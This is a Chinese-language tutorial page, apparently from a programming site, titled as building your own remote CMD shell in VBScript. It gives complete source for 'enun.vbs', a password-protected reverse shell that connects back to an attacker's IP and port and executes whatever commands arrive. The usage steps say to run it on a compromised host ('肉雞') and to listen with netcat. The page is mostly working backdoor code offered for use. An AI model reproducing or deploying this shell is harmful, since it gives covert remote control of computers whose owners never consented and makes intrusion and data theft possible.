程序師世界是廣大編程愛好者互助、分享、學習的平台,程序師世界有你更精彩!
設為首頁 加入收藏
首頁
編程語言
C語言|JAVA編程
Python編程
網頁編程
ASP編程|PHP編程
JSP編程
數據庫知識
MYSQL數據庫|SqlServer數據庫
Oracle數據庫|DB2數據庫
 程式師世界 >> 編程語言 >> 更多編程語言 >> 更多關於編程 >> VBScript 打造自己的遠程CMDShell附使用教程

VBScript 打造自己的遠程CMDShell附使用教程

編輯:更多關於編程
    這個cmdshell需要結合nc進行配合使用,現在肉雞上執行cmdshell然後在本地上面運行nc,注意看下面的參數  

    請先下載 mswinsck.ocx 與 VB6Controls.reg!

    使用方法:

    1,控制:nc.exe,執行:nc -l -v -p 1234;



    2,目標:cscript.exe enun.vbs IP Port;



    3,密碼:enun。

    幾點說明:
    1,退出 SHELL,請輸入 “exit”,不要用 “Ctrl + C”,這樣的話只能等目標重啟或手動運行後門才能連接;
    2,Windows 7 等環境下普通標准用戶也能使用,但是獲取的權限相對有限。
    3,內部命令及管道使用如下圖:

    相關下載:
          1,視頻演示
          2,vb6controls

    enun.vbs 源碼:

    復制代碼 代碼如下:


    '--------------------------------------------------------------------------
    ' Copyright (c) lxzzr. All rights reserved.
    ' ScriptName: enun.vbs
    ' Creation Date: 28/8/2012
    ' Last Modified: 28/8/2012
    ' Author: lxzzr, www.enun.net
    ' E-mail: [email protected]
    ' Usage: Cscript.exe //nologo enun.vbs IP Port
    '--------------------------------------------------------------------------
    On Error Resume Next
    Public SocketObj, ExecObj, ShellObj
    RemoteHost = Wscript.Arguments(0)
    RemotePort = Wscript.Arguments(1)

    Do
     Do While (SocketObj.State <> 7)
      WScript.Echo "Try Connect to " & RemoteHost & ":" & RemotePort & " ..."

      Set SocketObj = WScript.CreateObject("MSWinsock.Winsock")
      SocketObj.Protocol = 0
      SocketObj.RemoteHost = RemoteHost
      SocketObj.RemotePort = RemotePort
      SocketObj.Connect

      WScript.Sleep 3000
     Loop

     WScript.Echo "Connected to server."
     SocketObj.SendData SocketObj.LocalHostName & " is Connected, Enter Password: "
     Do While (SocketObj.BytesReceived = 0)
      WScript.Sleep 10
     Loop

     '密碼驗證
     SocketObj.GetData Authkey, vbString
     If Split(Authkey, chr(10), -1, 1)(0) = "enun" Then

      Set ShellObj = CreateObject("WScript.Shell")
      sRevData = " "
      SocketObj.SendData "Logon Success, Welcome!" & chr(13) & chr(10)

      '循環等待執行命令
      Do
       Set ExecObj = ShellObj.Exec(Split(sRevData, chr(10), -1, 1)(0))

       SocketObj.SendData ExecObj.StdOut.ReadAll
       SocketObj.SendData ExecObj.StdErr.ReadAll

       If sRevData <> "" Then
        SocketObj.SendData chr(10) & "[" & SocketObj.LocalHostName & "@" & "enun]#: "
       End If

       If Left(sRevData, 4) = "exit" Then
        SocketObj.Close
        Exit Do
       End If

       SocketObj.GetData sRevData, vbString
       WScript.Sleep 1000
      Loop
     Else
      LockoutBadCount = LockoutBadCount + 1
      SocketObj.SendData "Logon Failure: Unknown user name or bad password." & chr(13) & chr(10)
      WScript.Sleep 1000
     End If

     '賬戶策略
     If (LockoutBadCount > 3) Then
      SocketObj.SendData "The User Account is locked!" & chr(13) & chr(10)
      WScript.Sleep 1000
      SocketObj.Close
      LockoutBadCount = 0
      WScript.Sleep 600*1000
     End If
    Loop

    1. 上一頁:
    2. 下一頁:
    更多關於編程
    關於ADO.NET數據庫操作中的增刪改查講解

       我們要連接數據庫之後就要對它進行增刪改查,這
    哪門編程語言影響力最大?

    TIOBE每個月都會給編程語言排名,從側面說明哪些編程語言使
    C#使用代理IP使用方法

       簡要介紹一:WebProxy :即HTTP

    MFC繪制不規則窗體的方法

       本文實例講述了MFC 繪制不規則窗體的方法。
    Python的Flask框架中web表單的教程

       下面為你介紹了Python的Flask框架中
    Python腳本文件打包成可執行文件的方法

       這篇文章主要介紹了Python腳本文件打包成
    相關文章
    閱讀排行榜
    動態webservice調用接口並讀取解析返回結果 使用url_helper簡化Python中Django框架的url配置教程 Ruby中數組的一些相關使用方法 Unity3D中文入門教程 正則表達式應用技巧四則 分析Python中的內存洩漏 c#後台修改前台DOM的css屬性示例代碼 淺談Python中copy()方法的使用 [c++]派生類的應用 Python編程入門的一些基本知識 PowerShell實現按條件終止管道的方法
    熱門圖文
    羅雲彬VxD教程--DeviceIoControl接口 ASP.NET中存取SQL Server數據庫中的圖片 PHP變量在zend內核中的存儲方式 extern &quot;C&quot;的簡單解析 HDU4451Dressing(計數) Hosting-php-dynamic (Auth Bypass) Vulnerability 淺析PHP安裝擴展mcrypt以及相關依賴項(PHP安裝PECL擴展的方法) LeetCode--Min Stack
    欄目導航
    匯編語言DelphiGroovyWebSphereRationalPythonRuby編程解疑編程綜合問答更多關於編程編程問題解答
    Copyright © 程式師世界 All Rights Reserved